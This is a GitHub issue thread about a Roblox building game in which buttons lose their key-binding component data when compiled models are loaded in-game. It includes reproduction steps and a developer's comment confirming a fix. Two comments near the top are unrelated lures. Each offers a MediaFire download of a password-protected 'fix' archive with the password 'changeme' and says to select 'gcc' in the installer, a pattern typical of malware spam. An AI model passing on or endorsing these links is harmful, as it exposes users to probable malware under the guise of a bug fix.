### ISSUE TITLE
Buttons not loading their component data upon spawning ingame

### ISSUE THREAD

**Issue by Meowkitty-Hates** [Eggs-D-Studios/wos-issues#296]
### Guidelines

- [x] I checked for duplicate bug reports
- [X] I tried to find a way to reproduce the bug

### Version

Main (Production)

### What happened? What did you expect to happen?

Upon trying to load in a rudimentary ship, I noticed the keybinds weren't working when I was in the vehicle seat. Opening their config menu and seeing their `Key` data be blank concluded why. I did some more testing pertaining to this, and noticed that this holds true for all other component data for `Button`s, `WirelessButton`s, and `ProximityButton`s. This *may* be the case for other parts/components, though only more testing will lead to finding out.

This is a rather annoying bug, since it means loading any models that utilize keybound buttons on vehicle seats will have to be manually reconfigured to their corresponding buttons, but simply doing that and then saving said models ingame with the fixed keybinds bypasses the bug. My best guess is that compiling buttons doesn't really save the component data yet, and when loaded ingame, the default values are set since it doesn't know what else to put in them.

### How can we reproduce this bug?

1. Spawn in a button in Roblox studio and modify its component data (particularly the `KeyButton` component data).
2. Compile it and load it ingame.
3. Open the `config` menu for the button and watch in horror as the ghouls revert all of the data to its default values.

### Frequency

Always

**Comment by cnhbliyou** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by qiliq** [comment]
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by Hexcede** [comment]
`WirelessButton` and `ProximityButton` don't use components but this bug report is still valid

**Comment by dogranger1** [comment]
![image](https://github.com/user-attachments/assets/299e708e-539f-4b89-aec7-6f67edc8b3d1)


https://github.com/user-attachments/assets/3c7287fb-a285-48d4-aaf1-86c600f48ce5


buttons now load with their components 


![image](https://github.com/user-attachments/assets/e713a44b-a378-44c2-980a-eb3c8708f028)

https://github.com/user-attachments/assets/23dce7be-cc00-4aae-9488-cbf052cf8e51

ProximityButton s and WirelessButton s now work when loaded from model builder, though ProximityButton's default values for GamepadKey and KeyboardKey is in terms of enum (which, when loaded, will result in the default value being used)

![image](https://github.com/user-attachments/assets/75e6933e-eede-4eb6-8be0-82fc7aa1d92c)
